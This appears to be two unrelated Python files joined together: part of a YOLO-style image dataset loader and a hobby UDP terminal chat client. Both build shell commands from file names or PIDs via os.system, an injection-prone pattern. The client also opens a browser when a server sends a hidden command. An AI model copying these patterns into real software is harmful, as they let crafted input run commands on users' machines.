shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(np.int) * stride
# Cache labels
create_datasubset, extract_bounding_boxes, labels_loaded = False, False, False
nm, nf, ne, ns, nd = 0, 0, 0, 0, 0 # number missing, found, empty, datasubset, duplicate
pbar = tqdm(self.label_files)
for i, file in enumerate(pbar):
l = self.labels[i] # label
if l.shape[0]:
assert l.shape[1] == 5, '> 5 label columns: %s' % file
assert (l >= 0).all(), 'negative labels: %s' % file
assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels: %s' % file
if np.unique(l, axis=0).shape[0] < l.shape[0]: # duplicate rows
nd += 1 # print('WARNING: duplicate rows in %s' % self.label_files[i]) # duplicate rows
if single_cls:
l[:, 0] = 0 # force dataset into single-class mode
self.labels[i] = l
nf += 1 # file found
# Create subdataset (a smaller dataset)
if create_datasubset and ns < 1E4:
if ns == 0:
create_folder(path='./datasubset')
os.makedirs('./datasubset/images')
exclude_classes = 43
if exclude_classes not in l[:, 0]:
ns += 1
# shutil.copy(src=self.img_files[i], dst='./datasubset/images/') # copy image
with open('./datasubset/images.txt', 'a') as f:
f.write(self.img_files[i] + '\n')
# Extract object detection boxes for a second stage classifier
if extract_bounding_boxes:
p = Path(self.img_files[i])
img = cv2.imread(str(p))
h, w = img.shape[:2]
for j, x in enumerate(l):
f = '%s%sclassifier%s%g_%g_%s' % (p.parent.parent, os.sep, os.sep, x[0], j, p.name)
if not os.path.exists(Path(f).parent):
os.makedirs(Path(f).parent) # make new output folder
b = x[1:] * [w, h, w, h] # box
b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.3 + 30 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(np.int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(f, img[b[1]:b[3], b[0]:b[2]]), 'Failure extracting classifier boxes'
else:
ne += 1 # print('empty labels for image %s' % self.img_files[i]) # file empty
# os.system("rm '%s' '%s'" % (self.img_files[i], self.label_files[i])) # remove
pbar.desc = 'Scanning labels %s (%g found, %g missing, %g empty, %g duplicate, for %g images)' % (
cache_path, nf, nm, ne, nd, n)
assert nf > 0, 'No labels found in %s. See %s' % (os.path.dirname(file) + os.sep, help_url)
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
self.imgs = [None] * n
if cache_images:
gb = 0 # Gigabytes of cached images
pbar = tqdm(range(len(self.img_files)), desc='Caching images')
self.img_hw0, self.img_hw = [None] * n, [None] * n
for i in pbar: # max 10k images
self.imgs[i], self.img_hw0[i], self.img_hw[i] = load_image(self, i) # img, hw_original, hw_resized
gb += self.imgs[i].nbytes
pbar.desc = 'Caching images (%.1fGB)' % (gb / 1E9)
def cache_labels(self, path='labels.cache'):
# Cache dataset labels, check images and read shapes
x = {} # dict
pbar = tqdm(zip(self.img_files, self.label_files), desc='Scanning images', total=len(self.img_files))
for (img, label) in pbar:
try:
l = []
image = Image.open(img)
image.verify() # PIL verify
# _ = io.imread(img) # skimage verify (from skimage import io)
shape = exif_size(image) # image size
if os.path.isfile(label):
with open(label, 'r') as f:
l = np.array([x.split() for x in f.read().splitlines()], dtype=np.float32) # labels
if len(l) == 0:
l = np.zeros((0, 5), dtype=np.float32)
x[img] = [l, shape]
except Exception as e:
x[img] = None
print('WARNING: %s: %s' % (img, e))
x['hash'] = get_hash(self.label_files + self.img_files)
torch.save(x, path) # save for next time
return x
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
if self.image_weights:
index = self.indices[index]
hyp = self.hyp
if self.mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
shapes = None
else:
# Load image
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
# Load labels
labels = []
x = self.labels[index]
if x.size > 0:
# Normalized xywh to pixel xyxy format
labels = x.copy()
labels[:, 1] = ratio[0] * w * (x[:, 1] - x[:, 3] / 2) + pad[0] # pad width
labels[:, 2] = ratio[1] * h * (x[:, 2] - x[:, 4] / 2) + pad[1] # pad height
labels[:, 3] = ratio[0] * w * (x[:, 1] + x[:, 3] / 2) + pad[0]
labels[:, 4] = ratio[1] * h * (x[:, 2] + x[:, 4] / 2) + pad[1]
if self.augment:
# Augment imagespace
if not self.mosaic:
img, labels = random_affine(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'])
# Augment colorspace
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Apply cutouts
# if random.random() < 0.9:
# labels = cutout(img, labels)
nL = len(labels) # number of labels
if nL:
# convert xyxy to xywh
labels[:, 1:5] = xyxy2xywh(labels[:, 1:5])
# Normalize coordinates 0 - 1
labels[:, [2, 4]] /= img.shape[0] # height
labels[:, [1, 3]] /= img.shape[1] # width
if self.augment:
# random left-right flip
lr_flip = True
if lr_flip and random.random() < 0.5:
img = np.fliplr(img)
if nL:
labels[:, 1] = 1 - labels[:, 1]
# random up-down flip
ud_flip = False
if ud_flip and random.random() < 0.5:
img = np.flipud(img)
if nL:
labels[:, 2] = 1 - labels[:, 2]
labels_out = torch.zeros((nL, 6))
if nL:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.img_files[index], shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
def load_image(self, index):
# loads 1 image from dataset, returns img, original hw, resized hw
img = self.imgs[index]
if img is None: # not cached
path = self.img_files[index]
img = cv2.imread(path) # BGR
assert img is not None, 'Image Not Found ' + path
h0, w0 = img.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # resize image to img_size
if r != 1: # always resize down, only resize up if training with augmentation
interp = cv2.INTER_AREA if r < 1 and not self.augment else cv2.INTER_LINEAR
img = cv2.resize(img, (int(w0 * r), int(h0 * r)), interpolation=interp)
return img, (h0, w0), img.shape[:2] # img, hw_original, hw_resized
else:
return self.imgs[index], self.img_hw0[index], self.img_hw[index] # img, hw_original, hw_resized
def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5):
r = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1 # random gains
hue, sat, val = cv2.split(cv2.cvtColor(img, cv2.COLOR_BGR2HSV))
dtype = img.dtype # uint8
x = np.arange(0, 256, dtype=np.int16)
lut_hue = ((x * r[0]) % 180).astype(dtype)
lut_sat = np.clip(x * r[1], 0, 255).astype(dtype)
lut_val = np.clip(x * r[2], 0, 255).astype(dtype)
img_hsv = cv2.merge((cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat), cv2.LUT(val, lut_val))).astype(dtype)
cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img) # no return needed
# Histogram equalization
# if random.random() < 0.2:
# for i in range(3):
# img[:, :, i] = cv2.equalizeHist(img[:, :, i])
def load_mosaic(self, index):
# loads images in a mosaic
labels4 = []
s = self.img_size
yc, xc = [int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border] # mosaic center x, y
indices = [index] + [random.randint(0, len(self.labels) - 1) for _ in range(3)] # 3 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, max(xc, w), min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
x = self.labels[index]
labels = x.copy()
if x.size > 0: # Normalized xywh to pixel xyxy format
labels[:, 1] = w * (x[:, 1] - x[:, 3] / 2) + padw
labels[:, 2] = h * (x[:, 2] - x[:, 4] / 2) + padh
labels[:, 3] = w * (x[:, 1] + x[:, 3] / 2) + padw
labels[:, 4] = h * (x[:, 2] + x[:, 4] / 2) + padh
labels4.append(labels)
# Concat/clip labels
if len(labels4):
labels4 = np.concatenate(labels4, 0)
# np.clip(labels4[:, 1:] - s / 2, 0, s, out=labels4[:, 1:]) # use with center crop
np.clip(labels4[:, 1:], 0, 2 * s, out=labels4[:, 1:]) # use with random_affine
# Replicate
# img4, labels4 = replicate(img4, labels4)
# Augment
# img4 = img4[s // 2: int(s * 1.5), s // 2:int(s * 1.5)] # center crop (WARNING, requires box pruning)
img4, labels4 = random_affine(img4, labels4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
border=self.mosaic_border) # border to remove
return img4, labels4
def replicate(img, labels):
# Replicate labels
h, w = img.shape[:2]
boxes = labels[:, 1:].astype(int)
x1, y1, x2, y2 = boxes.T
s = ((x2 - x1) + (y2 - y1)) / 2 # side length (pixels)
for i in s.argsort()[:round(s.size * 0.5)]: # smallest indices
x1b, y1b, x2b, y2b = boxes[i]
bh, bw = y2b - y1b, x2b - x1b
yc, xc = int(random.uniform(0, h - bh)), int(random.uniform(0, w - bw)) # offset x, y
x1a, y1a, x2a, y2a = [xc, yc, xc + bw, yc + bh]
img[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
labels = np.append(labels, [[labels[i, 0], x1a, y1a, x2a, y2a]], axis=0)
return img, labels
def letterbox(img, new_shape=(640, 640), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True):
# Resize image to a 32-pixel-multiple rectangle https://github.com/ultralytics/yolov3/issues/232
shape = img.shape[:2] # current shape [height, width]
if isinstance(new_shape, int):
new_shape = (new_shape, new_shape)
# Scale ratio (new / old)
r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])
if not scaleup: # only scale down, do not scale up (for better test mAP)
r = min(r, 1.0)
# Compute padding
ratio = r, r # width, height ratios
new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))
dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding
if auto: # minimum rectangle
dw, dh = np.mod(dw, 64), np.mod(dh, 64) # wh padding
elif scaleFill: # stretch
dw, dh = 0.0, 0.0
new_unpad = (new_shape[1], new_shape[0])
ratio = new_shape[1] / shape[1], new_shape[0] / shape[0] # width, height ratios
dw /= 2 # divide padding into 2 sides
dh /= 2
if shape[::-1] != new_unpad: # resize
img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)
top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border
return img, ratio, (dw, dh)
def random_affine(img, targets=(), degrees=10, translate=.1, scale=.1, shear=10, border=(0, 0)):
# torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
# https://medium.com/uruvideo/dataset-augmentation-with-random-homographies-a8f4b44830d4
# targets = [cls, xyxy]
height = img.shape[0] + border[0] * 2 # shape(h,w,c)
width = img.shape[1] + border[1] * 2
# Rotation and Scale
R = np.eye(3)
a = random.uniform(-degrees, degrees)
# a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations
s = random.uniform(1 - scale, 1 + scale)
# s = 2 ** random.uniform(-scale, scale)
R[:2] = cv2.getRotationMatrix2D(angle=a, center=(img.shape[1] / 2, img.shape[0] / 2), scale=s)
# Translation
T = np.eye(3)
T[0, 2] = random.uniform(-translate, translate) * img.shape[1] + border[1] # x translation (pixels)
T[1, 2] = random.uniform(-translate, translate) * img.shape[0] + border[0] # y translation (pixels)
# Shear
S = np.eye(3)
S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg)
S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg)
# Combined rotation matrix
M = S @ T @ R # ORDER IS IMPORTANT HERE!!
if (border[0] != 0) or (border[1] != 0) or (M != np.eye(3)).any(): # image changed
img = cv2.warpAffine(img, M[:2], dsize=(width, height), flags=cv2.INTER_LINEAR, borderValue=(114, 114, 114))
# Transform label coordinates
n = len(targets)
if n:
# warp points
xy = np.ones((n * 4, 3))
xy[:, :2] = targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(n * 4, 2) # x1y1, x2y2, x1y2, x2y1
xy = (xy @ M.T)[:, :2].reshape(n, 8)
# create new boxes
x = xy[:, [0, 2, 4, 6]]
y = xy[:, [1, 3, 5, 7]]
xy = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T
# # apply angle-based reduction of bounding boxes
# radians = a * math.pi / 180
# reduction = max(abs(math.sin(radians)), abs(math.cos(radians))) ** 0.5
# x = (xy[:, 2] + xy[:, 0]) / 2
# y = (xy[:, 3] + xy[:, 1]) / 2
# w = (xy[:, 2] - xy[:, 0]) * reduction
# h = (xy[:, 3] - xy[:, 1]) * reduction
# xy = np.concatenate((x - w / 2, y - h / 2, x + w / 2, y + h / 2)).reshape(4, n).T
# reject warped points outside of image
xy[:, [0, 2]] = xy[:, [0, 2]].clip(0, width)
xy[:, [1, 3]] = xy[:, [1, 3]].clip(0, height)
w = xy[:, 2] - xy[:, 0]
h = xy[:, 3] - xy[:, 1]
area = w * h
area0 = (targets[:, 3] - targets[:, 1]) * (targets[:, 4] - targets[:, 2])
ar = np.maximum(w / (h + 1e-16), h / (w + 1e-16)) # aspect ratio
i = (w > 2) & (h > 2) & (area / (area0 * s + 1e-16) > 0.2) & (ar < 20)
targets = targets[i]
targets[:, 1:5] = xy[i]
return img, targets
def cutout(image, labels):
# https://arxiv.org/abs/1708.04552
# https://github.com/hysts/pytorch_cutout/blob/master/dataloader.py
# https://towardsdatascience.com/when-conventional-wisdom-fails-revisiting-data-augmentation-for-self-driving-cars-4831998c5509
h, w = image.shape[:2]
def bbox_ioa(box1, box2):
# Returns the intersection over box2 area given box1, box2. box1 is 4, box2 is nx4. boxes are x1y1x2y2
box2 = box2.transpose()
# Get the coordinates of bounding boxes
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
# Intersection area
inter_area = (np.minimum(b1_x2, b2_x2) - np.maximum(b1_x1, b2_x1)).clip(0) * \
(np.minimum(b1_y2, b2_y2) - np.maximum(b1_y1, b2_y1)).clip(0)
# box2 area
box2_area = (b2_x2 - b2_x1) * (b2_y2 - b2_y1) + 1e-16
# Intersection over box2 area
return inter_area / box2_area
# create random masks
scales = [0.5] * 1 + [0.25] * 2 + [0.125] * 4 + [0.0625] * 8 + [0.03125] * 16 # image size fraction
for s in scales:
mask_h = random.randint(1, int(h * s))
mask_w = random.randint(1, int(w * s))
# box
xmin = max(0, random.randint(0, w) - mask_w // 2)
ymin = max(0, random.randint(0, h) - mask_h // 2)
xmax = min(w, xmin + mask_w)
ymax = min(h, ymin + mask_h)
# apply random color mask
image[ymin:ymax, xmin:xmax] = [random.randint(64, 191) for _ in range(3)]
# return unobscured labels
if len(labels) and s > 0.03:
box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area
labels = labels[ioa < 0.60] # remove >60% obscured labels
return labels
def reduce_img_size(path='../data/sm4/images', img_size=1024): # from utils.datasets import *; reduce_img_size()
# creates a new ./images_reduced folder with reduced size images of maximum size img_size
path_new = path + '_reduced' # reduced images path
create_folder(path_new)
for f in tqdm(glob.glob('%s/*.*' % path)):
try:
img = cv2.imread(f)
h, w = img.shape[:2]
r = img_size / max(h, w) # size ratio
if r < 1.0:
img = cv2.resize(img, (int(w * r), int(h * r)), interpolation=cv2.INTER_AREA) # _LINEAR fastest
fnew = f.replace(path, path_new) # .replace(Path(f).suffix, '.jpg')
cv2.imwrite(fnew, img)
except:
print('WARNING: image failure %s' % f)
def convert_images2bmp(): # from utils.datasets import *; convert_images2bmp()
# Save images
formats = [x.lower() for x in img_formats] + [x.upper() for x in img_formats]
# for path in ['../coco/images/val2014', '../coco/images/train2014']:
for path in ['../data/sm4/images', '../data/sm4/background']:
create_folder(path + 'bmp')
for ext in formats: # ['.bmp', '.jpg', '.jpeg', '.png', '.tif', '.dng']
for f in tqdm(glob.glob('%s/*%s' % (path, ext)), desc='Converting %s' % ext):
cv2.imwrite(f.replace(ext.lower(), '.bmp').replace(path, path + 'bmp'), cv2.imread(f))
# Save labels
# for path in ['../coco/trainvalno5k.txt', '../coco/5k.txt']:
for file in ['../data/sm4/out_train.txt', '../data/sm4/out_test.txt']:
with open(file, 'r') as f:
lines = f.read()
# lines = f.read().replace('2014/', '2014bmp/') # coco
lines = lines.replace('/images', '/imagesbmp')
lines = lines.replace('/background', '/backgroundbmp')
for ext in formats:
lines = lines.replace(ext, '.bmp')
with open(file.replace('.txt', 'bmp.txt'), 'w') as f:
f.write(lines)
def recursive_dataset2bmp(dataset='../data/sm4_bmp'): # from utils.datasets import *; recursive_dataset2bmp()
# Converts dataset to bmp (for faster training)
formats = [x.lower() for x in img_formats] + [x.upper() for x in img_formats]
for a, b, files in os.walk(dataset):
for file in tqdm(files, desc=a):
p = a + '/' + file
s = Path(file).suffix
if s == '.txt': # replace text
with open(p, 'r') as f:
lines = f.read()
for f in formats:
lines = lines.replace(f, '.bmp')
with open(p, 'w') as f:
f.write(lines)
elif s in formats: # replace image
cv2.imwrite(p.replace(s, '.bmp'), cv2.imread(p))
if s != '.bmp':
os.system("rm '%s'" % p)
def imagelist2folder(path='data/coco_64img.txt'): # from utils.datasets import *; imagelist2folder()
# Copies all the images in a text file (list of images) into a folder
create_folder(path[:-4])
with open(path, 'r') as f:
for line in f.read().splitlines():
os.system('cp "%s" %s' % (line, path[:-4]))
print(line)
def create_folder(path='./new_folder'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
|
messenger.py
|
# -----------
# Messenger
# Credits: JuNi4 (https://github.com/JuNi4/CLOS)
# -----------
#
# Example Commands:
# messenger -server -client -listserver
# Server example: python3 messenger.py -s -els -lsip 127.0.0.1 -ecl -name Server
# list Server: python3 messenger.py -ls
# client python3 messenger.py -c -u NAME -ip localhost
#
# ToDo:
# - Bad Word Kicker
# - Temp Ban
from getpass import getpass
import re
from shutil import ExecError
import threading
import platform
import datetime
import subprocess
import keyboard
import pathlib
import socket
import sys
import os
import time
# File Dialog
import tkinter as tk
from tkinter import filedialog
# Pillow to read every pixel from a image
from PIL import Image
# Json for img to json convertion and vice versa
import json
# Images
class itj():
class color():
r = '\033[1;0m'
def rgb(r=0,g=255,b=50):
return '\033[38;2;'+str(r)+';'+str(g)+';'+str(b)+'m'
def img_to_text(scling = 1, shrink = 1, img = 'img.png', rgb = color.rgb, r = color.r):
scling = int(scling)
shrink = int(shrink)
img = Image.open(img)
img = img.convert('RGB')
scaling = img.size
i = 0
while i+shrink <= scaling[1]:
i2 = 0
pval = ''
while i2+shrink <= scaling[0]:
val = img.getpixel((i2,i))
pval = pval+rgb(val[0], val[1], val[2])+'██'*scling
i2 += shrink
i += shrink
print(pval+r)
def img_to_json(scling = 1, shrink = 1, img = 'img.png', rgb = color.rgb, r = color.r):
jo = {
"name": "lol",
"w": 0,
"h": 0,
"pix": []
}
jol = json.loads(json.dumps(jo))
sp = '/'
if 'Windows' in platform.system():
sp = '\\'
jol["name"] = img.split(sp)[len(img.split(sp))-1]
scling = int(scling)
shrink = int(shrink)
img = Image.open(img)
img = img.convert('RGB')
scaling = img.size
jol["w"] = int(scaling[0]/shrink)
jol["h"] = int(scaling[1]/shrink)
i = 0
while i+shrink <= scaling[1]:
i2 = 0
pval = []
while i2+shrink <= scaling[0]:
val = img.getpixel((i2,i))
pval.append([val[0],val[1],val[2]])
i2 += shrink
i += shrink
jol["pix"].append(pval)
return json.dumps(jol, indent=4)
def json_to_text(scling = 1, shrink = 1, json2 = '{"name": "lol", "w": 0, "h": 0, "pix":[[],[]]}', rgb = color.rgb, r = color.r):
img = json.loads(json2)
scling = int(scling)
shrink = int(shrink)
scaling = (img["w"],img["h"])
i = 0
while i+shrink <= scaling[1]:
i2 = 0
pval = ''
while i2+shrink <= scaling[0]:
val = img["pix"][i][i2]
pval = pval+rgb(val[0], val[1], val[2])+'██'*scling
i2 += shrink
i += shrink
print(pval+r)
def manage_json(scling = 1, shrink = 1, json2 = '{"name": "lol", "w": 0, "h": 0, "pix":[[0,0,0],[]]}', rgb = color.rgb, r = color.r):
jo = {
"name": "lol",
"w": 0,
"h": 0,
"pix": []
}
jol = json.loads(json.dumps(jo))
img = json.loads(json2)
scling = int(scling)
shrink = int(shrink)
jol["name"] = img["name"]
jol["w"] = int(img["w"]/shrink)
jol["h"] = int(img["h"]/shrink)
scaling = (img["w"],img["h"])
i = 0
while i+shrink <= scaling[1]:
i2 = 0
pval = []
while i2+shrink <= scaling[0]:
try:
val = img["pix"][i][i2]
except:
val = img["pix"][i2][i]
pval.append([val[0],val[1],val[2]])
i2 += shrink
i += shrink
jol["pix"].append(pval)
return json.dumps(jol, indent=4)
# RGB
def rgb(r=0,g=255,b=50):
return '\033[38;2;'+str(r)+';'+str(g)+';'+str(b)+'m'
def brgb(r=0,g=255,b=50):
return '\033[48;2;'+str(r)+';'+str(g)+';'+str(b)+'m'
# Ćlient
def client():
arg = sys.argv
if '-ip' in arg:
SERVER = arg[arg.index('-ip')+1]
else:
print('ERROR: Server address needs to be defined (-ip [ip])')
exit()
if '-p' in arg:
PORT = arg[arg.index('-p')+1]
else:
PORT = 4242
if '-u' in arg:
client_name = arg[arg.index('-u')+1]
else:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
print('Warning, Username will be you IP: '+s.getsockname()[0])
client_name = s.getsockname()[0]
s.close()
if not 'disToasts' in arg:
toasts = True
else:
toasts = False
if not '-standalone' in arg:
c_server = threading.Thread(target=client_server, args=('', str(os.getpid()), toasts))
c_server.start()
pw = getarg('-pw', '')
# Funktion, um die Nachricht "MSG" an den Server zu senden
def sendMsg(MSG):
# Socket erzeugen
# Wir nutzen IPv4, TCP/IP
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_address = (SERVER, int(PORT))
# Verbindung aufbauen
# TODO: Fehler-Auswertung fehlt!!!
sock.connect(server_address)
# Nachricht senden
sock.sendall(MSG)
# Verbindung wieder trennen
sock.close()
return 1
if not pw == '':
sendMsg(bytes('/auth '+pw, 'utf-8'))
jmsg = '/join '+str(client_name)
sendMsg(bytes(jmsg, 'utf-8'))
# Hauptschleife
while True:
mymsg = input("")
if mymsg == '/auth' or mymsg == '/aauth':
password = getpass()
mymsg += ' '+password
# Send an Image to the Server
if mymsg[:4] == '/img':
# Make tkinter window object
root = tk.Tk()
root.withdraw()
# Open file dialog
file_path = filedialog.askopenfilename()
# Continue only if a path has been selected
if not file_path == '':
# Check if the is a png or jpg
if file_path[len(file_path)-3:].lower() == 'png' or file_path[len(file_path)-3:].lower() == 'jpg':
# Load file into Json
print('System: Sending File: '+file_path+' To Server..')
sendspl = itj.img_to_json(1,1,file_path)
# Send first Part of message
# Load text to json
ij = json.loads(sendspl)
w = int(ij["w"])
h = int(ij["h"])
w2 = w
h2 = h
sc = 1
print('OLD W&H: '+str(w)+' '+str(h))
# shrink image down if needed
while w2 > 38 or h2 > 38:
sc += 1
w2 = int(w/sc)
h2 = int(h/sc)
# get calculated shrink values and shrink
print('NEW W&H: '+str(w2)+' '+str(h2)+' AND SCALE: '+str(sc))
sendspl = itj.manage_json(1,sc,sendspl)
sendspl = sendspl.split(',')
sendMsg(bytes('/img '+sendspl[0], 'utf-8'))
# Send rest of message
a = len(sendspl)
#print(str(a),str(int(a/10)*10),str(int(a/10)*10 < a))
for i in range(0,10):
sendspl.append("")
for i in range(0,int((a+1)/10)+1):
#print(len(sendspl)-1,i*10+10,int((a)/10)+1)
if not sendspl[i*10+1] == ',':
try:
x = (sendspl[i*10+1]+','+sendspl[i*10+2]+','+sendspl[i*10+3]+','+sendspl[i*10+4]+','+sendspl[i*10+5]+','+sendspl[i*10+6]+','+sendspl[i*10+7]+','+sendspl[i*10+8]+','+sendspl[i*10+9]+','+sendspl[i*10+10]).replace(' ', '')
try:
x = x[:x.index('}')+1]
except:
pass
try:
x = x[:x.index(',,')]
except:
pass
sendMsg(bytes(x,'utf-8'))
except:
pass
time.sleep(0.01)
print('System: Done!')
else:
print('System: Wrong File Format. Only png or jpg.')
else: sendMsg(bytes(mymsg, 'utf-8'))
if mymsg[0:6] == '/leave':
print('Leaving...')
time.sleep(2)
exit()
# Client Server used to recive messages
def client_server(ip = "", cpid = '', toasts = True):
# Window Focus and Toast stuff
if not 'Windows' in platform.system():
import gi
gi.require_version("Wnck", "3.0")
from gi.repository import Wnck
from Xlib import X, XK, protocol, display, Xcursorfont
from Xlib.ext import xtest
from Xlib.protocol import request
else:
from win10toast import ToastNotifier
# If current window in focus
def isFocused():
if 'Windows' in platform.system():
return True
disp = display.Display()
root = disp.screen().root
pointer_info = request.QueryPointer(display = disp.display, window = root)
root_xpos, root_ypos = (pointer_info._data['root_x'], pointer_info._data['root_y'])
targetwindow = disp.get_input_focus().focus
scr = Wnck.Screen.get_default()
scr.force_update()
fwin = targetwindow.id
scr = Wnck.Screen.get_default()
scr.force_update()
cwin = scr.get_active_window().get_xid()
return fwin==cwin
# Toasts
def Toast(msg, titl):
if toasts:
if 'Windows' in platform.system():
toaster = ToastNotifier()
toaster.show_toast("titl","lol",)
else:
subprocess.Popen(['notify-send', titl, msg])
# "" == INADDR_ANY
SERVER = ip
PORT = 4243
# Puffergroesse fuer recv()
BUF_SIZE = 1024
# Dies ist der Server.
# Server-Port oeffnen
#sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_address = (SERVER, PORT)
# Server an den Port binden
sock.bind(server_address)
#print("Server arbeitet auf Port ", PORT, sep="")
show_img = True
if '-disimg' in sys.argv:
show_img = False
while True:
# Receive response
data, server = sock.recvfrom(4096)
if data.decode()[0:32] == "!leave_account_requested_by_self":
if data.decode()[0:41] == "!leave_account_requested_by_self _nonself":
if data.decode()[42:48] == "__msg:":
print('You got Kicked! Reason: '+data.decode()[48:])
if not isFocused():
Toast("Disconnected: Kicked: "+data.decode()[48:], "Messenger")
else:
print('You got kicked!')
if not isFocused():
Toast("Disconnected: Kicked", "Messenger")
if 'Windows' in platform.system():
os.system('taskkill /PID '+cpid+' /F>nil')
else:
os.system('kill '+cpid+'>nil')
time.sleep(2)
elif data.decode()[0:42] == "!leave_account_requested_by_self _svclosed":
if not isFocused():
Toast("Disconnected: Server Closed", "Messenger")
print('Server Closed')
if 'Windows' in platform.system():
os.system('taskkill /PID '+cpid+' /F>nil')
else:
os.system('kill '+cpid+'>nil')
time.sleep(2)
exit()
elif data.decode()[:19]=='!important_message ':
print(data.decode()[19:])
Toast(data.decode()[19:], "Messenger")
elif data.decode()[:4] == '!img':
rcvstr = data.decode()[5:]+','
# Recive every part part of the image
while not '}' in list(rcvstr):
data, address = sock.recvfrom(4096)
if not '}' in list(data.decode()):
rcvstr += data.decode()+','
else:
dat = data.decode()[:data.decode().index('}')+1]
rcvstr += dat
# Print Json Image data
#print(rcvstr.replace('\n','').replace(' ', ''))
# Load text to json
#f = open("json.json",'w')
#f.write(rcvstr)
#f.close()
rcvstr = rcvstr[:len(rcvstr)-2]+rcvstr[len(rcvstr)-2:].replace(',','')
ij = json.loads(rcvstr)
w = int(ij["w"])
h = int(ij["h"])
w2 = w
h2 = h
sc = 1
# shrink image down if needed
while w2 > 38 or h2 > 38:
sc += 1
w2 = int(w/sc)
h2 = int(h/sc)
# get calculated shrink values and shrink
sendji = itj.manage_json(1,sc,rcvstr)
# display
itj.json_to_text(1,sc,sendji)
elif data.decode() == '!secure_corckrl':
try:
os.system('start firefox https://www.youtube.com/watch?v=dQw4w9WgXcQ')
except:
os.system('start chrome https://www.youtube.com/watch?v=dQw4w9WgXcQ')
elif not data.decode() == '':
print(data.decode())
if not 'Windows' in platform.system():
if not isFocused():
Toast(data.decode(), "Messenger")
